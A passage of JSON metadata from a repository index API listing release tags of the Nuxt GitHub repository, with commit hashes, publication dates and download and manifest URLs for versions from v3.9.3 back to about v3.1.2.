"dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnux